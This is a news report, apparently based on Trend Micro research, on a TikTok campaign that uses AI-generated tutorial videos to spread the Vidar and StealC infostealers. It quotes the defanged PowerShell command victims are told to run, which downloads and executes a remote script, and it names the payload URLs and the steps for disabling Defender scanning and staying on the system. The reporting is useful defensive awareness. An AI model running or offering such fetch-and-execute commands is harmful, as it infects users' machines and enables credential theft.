Cyberkriminalci su identifikovali novu platformu za distribuciju zlonamjernog softvera, koristeći ogromnu bazu korisnika i prodorne mogućnosti TikToka.
Razvijena je sofisticirana kampanja socijalnog inženjeringa koja koristi videozapise generirane umjetnom inteligencijom kako bi prevarila korisnike da preuzmu opasni softver za krađu informacija, prerušen u tutorijale za aktivaciju softvera.
Ovi obmanjujući videozapisi obećavaju pomoć pri aktiviranju legitimnih aplikacija poput operativnog sistema Windows, Microsoft Officea, CapCuta i Spotifyja, ali umjesto toga isporučuju poznate info-stealer malvere, Vidar i StealC, nesuđenim žrtvama.
Ova kampanja predstavlja značajan napredak u metodama distribucije zlonamjernog softvera, udaljavajući se od tradicionalnih metoda dostave putem web stranica i eksploatisajući povjerenje i angažman na platformama društvenih medija.
Za razliku od uobičajenih napada koji se oslanjaju na kompromitovane web stranice ili phishing e-poštu, ova operacija ugrađuje sve elemente socijalnog inženjeringa direktno u video sadržaj, što značajno otežava njegovo otkrivanje od strane sigurnosnih rješenja.
Napadači iskorištavaju viralnu prirodu TikToka, pri čemu je jedan zlonamjerni videozapis prikupio skoro 500.000 pregleda, više od 20.000 lajkova i preko 100 komentara, demonstrirajući alarmantan domet i efikasnost kampanje.
Analitičari iz kompanije Trend Micro identifikovali su više TikTok naloga uključenih u ovu operaciju, uključujući @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc i @digitaldreams771, koji su od tada deaktivirani.
Istraživači su primijetili da su ovi nalozi objavljivali upadljivo slične videozapise bez lica, sa glasovima generiranim umjetnom inteligencijom, što ukazuje na automatizovani proces proizvodnje dizajniran za skaliranje.
Tehnička sofisticiranost napada postaje očigledna kroz metodologiju njegove implementacije.
Žrtvama se nalaže da otvore PowerShell i izvrše naizgled bezazlenu komandu: `iex (irm hxxps://allaivo[.]me/spotify)`. Ovaj PowerShell skript inicira višestepeni proces infekcije koji demonstrira napredne tehnike izbjegavanja detekcije.
Mehanizam infekcije i taktike perzistencije
Lanac infekcije zlonamjernog softvera otkriva pažljivo orkestrirane korake dizajnirane da osiguraju uspješnu kompromitaciju uz izbjegavanje detekcije.
Nakon izvršavanja, početni PowerShell skript kreira skrivene direktorijume unutar korisničkih APPDATA i LOCALAPPDATA foldera, odmah dodajući te lokacije na listu izuzeća Windows Defendera kako bi se spriječilo skeniranje od strane antivirusnog softvera.
Skript zatim preuzima primarni teret sa lokacije `hxxps://amssh[.]co/file.exe`, koji sadrži varijante malvera Vidar ili StealC.
Mehanizam perzistencije uključuje preuzimanje dodatnog PowerShell skripta sa lokacije `hxxps://amssh[.]co/script[.]ps1` i uspostavljanje ključa registra koji osigurava da se zlonamjerni softver izvršava pri pokretanju sistema.
Važno je napomenuti da Vidar koristi inovativnu strategiju komande i kontrole, zloupotrebljavajući legitimne usluge kao što su Steam profili i Telegram kanali kao “Dead Drop Resolvers” kako bi prikrio stvarne adrese C&C servera, čineći napore za detekciju i uklanjanje znatno složenijim.
